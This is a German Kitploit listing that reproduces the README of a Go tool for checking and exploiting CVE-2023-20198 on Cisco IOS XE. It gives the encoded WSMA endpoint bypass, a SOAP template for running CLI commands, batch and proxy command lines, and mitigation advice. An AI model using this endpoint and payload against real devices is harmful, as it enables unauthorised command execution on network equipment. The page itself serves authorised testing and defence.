Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cisco-cve-2023-20198-checker — Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung. | Kitploit
Tools/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
SchwachstellenscannerExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsCommand and Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung.

Repository anzeigen
9vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cisco CVE-2023-20198 Checker

Go Version License Platform

Ein professioneller Vulnerability-Scanner zur Erkennung von CVE-2023-20198 auf Cisco IOS XE-Geräten. Testet auf anfällige SOAP/XML-Schnittstellen (WSMA). Entwickelt für autorisierte Sicherheitsbewertungen und Netzwerkaudits.

⚠️ Rechtlicher Hinweis

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool ist ausschließlich bestimmt für:

  • Autorisierte Schwachstellenscans
  • Sicherheitsaudits mit ausdrücklicher schriftlicher Zustimmung
  • Netzwerksicherheitsbewertungen
  • Bildungszwecke in kontrollierten Laborumgebungen
  • Compliance- und Penetrationstests

Unbefugter Zugriff auf Computersysteme ist ILLEGAL. Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie Systeme testen.


🚀 Schnellstart

Installation

Mit go install (empfohlen)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Die Binärdatei wird in Ihr $GOPATH/bin-Verzeichnis installiert (normalerweise ~/go/bin).

Manuelle Installation

# Repository klonen
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Bauen
go build -o cisco-cve-2023-20198-checker

# Installieren (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Einfache Nutzung

# Einzelnes Ziel prüfen
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Mehrere Ziele prüfen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# HTML-Bericht generieren
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Funktionen

  • ✅ Schwachstellenerkennung – Testet auf CVE-2023-20198 (WSMA-RCE)
  • ✅ Einzel- und Batch-Zielscans
  • ✅ Unterstützung für benutzerdefinierte Ports (Standard: 443)
  • ✅ Befehlsausführung über SOAP/XML
  • ✅ Professionelle HTML-Berichterstellung
  • ✅ Keine externen Abhängigkeiten
  • ✅ Plattformübergreifend (Linux, macOS, Windows)
  • ✅ Option zum Überspringen der SSL/TLS-Zertifikatsprüfung
  • ✅ Konfigurierbare Timeouts
  • ✅ Proxy-Unterstützung (HTTP, HTTPS, SOCKS5)
  • ✅ Authentifizierte Proxys
  • ✅ Unterstützung von Umgebungsvariablen (HTTP_PROXY, HTTPS_PROXY)

🌐 Proxy-Unterstützung

Perfekt für Unternehmensumgebungen! Unterstützt:

  • HTTP/HTTPS-Proxys
  • SOCKS5-Proxys (SSH-Tunnel, Tor)
  • Authentifizierte Proxys
  • Umgebungsvariablen
# HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Umgebungsvariable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Siehe PROXY_GUIDE.md für eine detaillierte Proxy-Konfiguration.


💻 Befehlszeilenoptionen

FlagTypStandardBeschreibung
-targetstring-Einzelnes Ziel-IP/Rechnername
-targets-filestring-Datei mit Zielen (eines pro Zeile)
-portint443HTTPS/SOAP-Port
-usernamestringadminSOAP-Benutzername
-passwordstring-Erforderlich. SOAP-Passwort
-commandstringuname -aAuszuführender Befehl
-htmlboolfalseHTML-Bericht generieren
-timeoutint10Request-Timeout (Sekunden)
-skip-verifybooltrueSSL-Überprüfung überspringen
-proxystring-Proxy-URL (http://, https://, socks5://)

📖 Anwendungsbeispiele

Einzelnes Ziel testen

# Grundlegende Schwachstellenprüfung
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Benutzerdefinierter Port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Bestimmten Befehl ausführen
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Bericht generieren
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Batch-Tests

# Zieldatei erstellen
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Alle Ziele testen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch mit HTML-Bericht
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Erweiterte Befehle

# Netzwerkerkundung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Versionserkennung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Über HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Über SOCKS5-Proxy (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Authentifizierter Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Über CVE-2023-20198

Schwachstellendetails

CVE-ID: CVE-2023-20198
CVSS-Score: 10.0 (Kritisch)
Typ: Remote Code Execution (RCE)
Betroffen: Cisco IOS XE Web UI (WSMA)

Technische Details

  • Endpunkt: /%2577ebui_wsma_https (Pfadcodierungs-Bypass)
  • Protokoll: SOAP 1.1 über HTTPS
  • Authentifizierung: WS-Security UsernameToken (gültige Anmeldedaten erforderlich)
  • Namespace: urn:cisco:wsma-exec
  • Auswirkung: Vollständige Kompromittierung des Geräts mit gültigen Anmeldedaten

SOAP-Request-Struktur

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Abhilfe

Für Systemadministratoren

Wenn Ihre Geräte angreifbar sind:

1. WSMA deaktivieren (falls nicht benötigt)

no ip http server
no ip http secure-server

2. Zugriff mit ACLs einschränken

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Firmware aktualisieren – Aktuelle Cisco-Sicherheitspatches einspielen

4. Starke Authentifizierung aktivieren

aaa new-model
aaa authentication login default group tacacs+ local

5. Protokolle überwachen – Auf verdächtige SOAP/HTTP-Aktivitäten achten


🏗️ Aus dem Quellcode bauen

Voraussetzungen

  • Go 1.21 oder höher

Bauen

# Standard-Build
go build -o cisco-cve-2023-20198-checker

# Optimiert (kleinere Binärdatei)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Für verschiedene Plattformen cross-kompilieren
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Ausgabebeispiele

Tool herunterladen